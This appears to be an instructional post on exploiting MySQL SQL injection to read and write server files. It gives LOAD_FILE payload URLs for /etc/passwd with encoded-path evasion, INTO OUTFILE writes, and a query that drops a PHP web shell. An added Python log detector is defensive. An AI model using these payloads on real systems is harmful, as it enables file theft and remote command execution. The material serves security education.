File System Access SQL Injection

Hi everyone, in this article we will examine how to exploit an SQL injection to gain read and write access to the file system underlying the DBMS.


READ ACCESS

It can be very useful to have read access to files on the compromised machine, since it can lead to disclosure of information.

Firstly, MySQL has a function that allows reading text or binary files on the underlying file system: LOAD_FILE(). The session user must have the FILE privilege, and the CREATE TABLE privilege for the support table (only needed via batched queries). The file content can be retrieved via UNION query, blind or error-based SQL injection techniques.
However, there are some limitations:

  • If the datatype of the column where the file content is appended is varchar, at most 5000 characters of the file are displayed.
  • In many cases the content is truncated to a few characters when it is retrieved via the error-based SQL injection technique.
  • The file can be in binary format and, depending on the web application language, it may not be displayable within the page content via the UNION query or error-based SQL injection technique.

http://site.com/sql.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7

or, with the path encoded:

load_file(0x2f6574632f706173737764)
load_file(char(47,101,116,99,47,112,97,115,115,119,100))

WRITE ACCESS

That covers read access. A file can be written via either the UNION query or the batched query SQL injection technique. Nevertheless, there are some limitations to be considered when using the UNION query technique:


  • If the injection point is on a GET parameter, some web servers impose a limit on the length of the request parameters.
  • It is not possible to append data to an existing file via INTO DUMPFILE clause.
These limitations can be bypassed by the following steps:

  • Encode the local file content to its corresponding hexadecimal string  
  • Split the hexadecimal encoded string into chunks 1024 characters long each

For example:
http://site.com/sql.php?id=-1+union+select+null,'normal text',null,null,null,null,null+into+outfile+'/tmp/everything'


http://site.com/sql.php?id=-1+union+select+null,<php or html code>,null,null,null,null,null+into+dumpfile+'/tmp/everything'

You can encode the HTML/PHP code or the directory path as a char() list or as a 0x... hexadecimal string.



Description           | Query
Dump to file          | SELECT * FROM mytable INTO DUMPFILE '/tmp/somefile'
Dump PHP shell        | SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
Read file             | SELECT LOAD_FILE('/etc/passwd')
Read file, obfuscated | SELECT LOAD_FILE(0x633A5C626F6F742E696E69)   (reads c:\boot.ini)
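As an added example (not from the original post), here is a small Python detector for the primitives discussed above. It URL-decodes a request line, finds LOAD_FILE() calls and INTO OUTFILE / INTO DUMPFILE clauses, and decodes the quoted, 0x-hex and char() encoded path forms shown in this post so that a log reviewer sees the real path. The request lines are constructed samples; the function and pattern names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample request lines (not taken from the original post).
SAMPLE_REQUESTS = [
    "/sql.php?id=5",
    "/sql.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7",
    "/sql.php?id=-1+union+select+1,load_file(0x2f6574632f706173737764),3",
    "/sql.php?id=-1+union+select+1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3",
    "/sql.php?id=-1+union+select+null,'x',null+into+outfile+'/tmp/everything'",
]

# LOAD_FILE(...) with one level of nested parentheses so char(...) arguments are captured.
FILE_FUNC = re.compile(r"load_file\s*\(\s*((?:[^()]|\([^()]*\))*)\)", re.I)
# INTO OUTFILE / INTO DUMPFILE followed by a quoted, hex or char() literal.
FILE_CLAUSE = re.compile(r"into\s+(outfile|dumpfile)\s+('[^']*'|0x[0-9a-f]+|char\([^)]*\))", re.I)
HEX_LIT = re.compile(r"^0x([0-9a-f]+)$", re.I)
CHAR_LIT = re.compile(r"^char\(([\d\s,]*)\)$", re.I)


def decode_literal(lit: str) -> str:
    """Recover a path from a quoted string, a 0x hex literal or a char(...) list."""
    lit = lit.strip()
    if len(lit) >= 2 and lit[0] == lit[-1] == "'":
        return lit[1:-1]
    m = HEX_LIT.match(lit)
    if m and len(m.group(1)) % 2 == 0:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    m = CHAR_LIT.match(lit)
    if m:
        return "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
    return lit  # unknown form: report it verbatim rather than drop it


def find_file_access(request: str) -> list:
    """Return (operation, decoded path) pairs for each file-system primitive found."""
    query = unquote_plus(request)  # '+' and %XX encoding as the web server sees them
    hits = []
    for m in FILE_FUNC.finditer(query):
        hits.append(("read", decode_literal(m.group(1))))
    for m in FILE_CLAUSE.finditer(query):
        hits.append(("write:" + m.group(1).lower(), decode_literal(m.group(2))))
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        hits = find_file_access(req)
        if hits:
            print(req, "->", hits)
```

Detection is the second line of defence; as the post notes, these primitives require the FILE privilege, so withholding it from the web application's database account removes them on the server side.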



Depending upon the configuration, this can be very complex to do and may require attention to the limits imposed by both the DBMS architecture and the web application.


I looked at my notes and wrote this article, so I don't remember some references. I hope I wrote clearly. I hope I will write an example with a real website. If I made a mistake, forgive me and tell me :D Good days.

https://sqlwiki.netspi.com/attackQueries/readingAndWritingFiles/#mysql
